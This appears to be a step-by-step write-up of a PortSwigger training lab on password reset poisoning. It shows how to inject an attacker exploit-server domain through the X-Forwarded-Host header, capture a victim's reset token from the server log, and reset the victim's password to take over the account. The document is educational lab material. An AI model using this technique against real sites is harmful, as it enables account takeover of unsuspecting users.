[This lab](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware) demonstrates a **password reset poisoning attack** via the `X-Forwarded-Host` header, allowing full compromise of another user's account by injecting an attacker-controlled domain into password reset links. The vulnerability is rooted in **trusting unsanitized headers when generating absolute URLs**, a common middleware misconfiguration.
---
#### Lab Context
* Attacker credentials:
`wiener:peter`
* Victim username:
`carlos`
* Emails sent during password reset can be monitored via the **exploit server's email client**
#### Step 1: Trigger Password Reset and Observe Header Behavior
Send a POST request to initiate password reset:
```
POST /forgot-password
Content-Type: application/x-www-form-urlencoded
username=wiener
```
Observe that the server sends an email containing a reset link structured like:
![[CleanShot 2025-07-14 at 23.05.49.png]]
The domain in this link is based on headers provided by the client.
---
#### Step 2: Poison the Host Header
Send the same request to Burp Repeater, but modify the headers as follows:
```
POST /forgot-password
Host: vulnerable-application.com
X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Type: application/x-www-form-urlencoded
username=carlos
```
![[CleanShot 2025-07-14 at 23.07.57.png]]
Effect: The backend will generate the password reset link using the attacker-controlled domain. Carlos will receive:
```
https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/forgot-password?temp-forgot-password-token=<victim-token>
```
---
#### Step 3: Capture the Reset Token
* Wait for Carlos to click the link (he automatically does so).
* Open the **access log** of your exploit server.
* You’ll see a request like:
```
GET /forgot-password?temp-forgot-password-token=abcdef123456...
```
Copy the token value.
---
#### Step 4: Forge the Reset Request Using the Stolen Token
In your email inbox (wiener’s account), get the reset link (which points to the original domain). It will look like:
```
https://vulnerable-application.com/forgot-password?temp-forgot-password-token=<your-token>
```
Replace the token with Carlos's token from the exploit server:
```
https://vulnerable-application.com/forgot-password?temp-forgot-password-token=abcdef123456...
```
Visit the modified URL. Set a new password for Carlos.
---
#### Step 5: Log in as Carlos
Use:
```
username: carlos
password: <your-new-password>
```
Access the **My Account** page. Lab solved.